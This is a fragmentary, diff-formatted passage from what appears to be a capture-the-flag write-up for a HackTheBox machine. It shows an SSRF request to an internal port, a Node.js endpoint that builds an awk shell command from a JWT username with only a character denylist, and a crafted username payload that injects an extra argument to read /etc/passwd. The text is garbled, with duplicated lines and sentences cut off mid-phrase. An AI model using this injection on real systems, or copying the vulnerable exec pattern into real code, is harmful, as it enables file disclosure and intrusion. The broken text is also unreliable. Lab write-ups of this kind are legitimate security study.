Let’s add awkward to /etc/hosts

 - Now that we know this we can visit:

-- We are going to be interested in the
+http://hat-valley.htb/api/store-status?url="http://localhost:3002" - We are going to be interested in the

-endpoint.app.get('/api/all-leave', (req, res) => { const user_token = req.cookies.token var authFailed = false var user = null if(user_token) { const decodedToken = jwt.verify(user_token, TOKEN_SECRET) if(!decodedToken.username) { authFailed = true } else { user = decodedToken.username } } if(authFailed) { return res.status(401).json({Error: "Invalid Token"}) } if(!user) { return res.status(500).send("Invalid user") } const bad = [";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"] const badInUser = bad.some(char => user.includes(char)); if(badInUser) { return res.status(500).send("Bad character detected.") } exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000}, (error, stdout, stderr) => { if(stdout) { return res.status(200).send(new Buffer(stdout, 'binary')); } if (error) { return res.status(500).send("Failed to retrieve leave requests") } if (stderr) { return res.status(500).send("Failed to retrieve leave requests") } }) })
+/api/all-leaveendpoint.app.get('/api/all-leave', (req, res) => { const user_token = req.cookies.token var authFailed = false var user = null if(user_token) { const decodedToken = jwt.verify(user_token, TOKEN_SECRET) if(!decodedToken.username) { authFailed = true } else { user = decodedToken.username } } if(authFailed) { return res.status(401).json({Error: "Invalid Token"}) } if(!user) { return res.status(500).send("Invalid user") } const bad = [";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"] const badInUser = bad.some(char => user.includes(char)); if(badInUser) { return res.status(500).send("Bad character detected.") } exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000}, (error, stdout, stderr) => { if(stdout) { return res.status(200).send(new Buffer(stdout, 'binary')); } if (error) { return res.status(500).send("Failed to retrieve leave requests") } if (stderr) { return res.status(500).send("Failed to retrieve leave requests") } }) }) - Our focus will be on:

-exec("awk '/" + user + "/' /var/www/private/leave_requests.csv",
+exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", - Since

 - Our username payload:

-"username": "/' /etc/passwd '",
+"username": "/' /etc/passwd '", - Go to

 - It will look like this: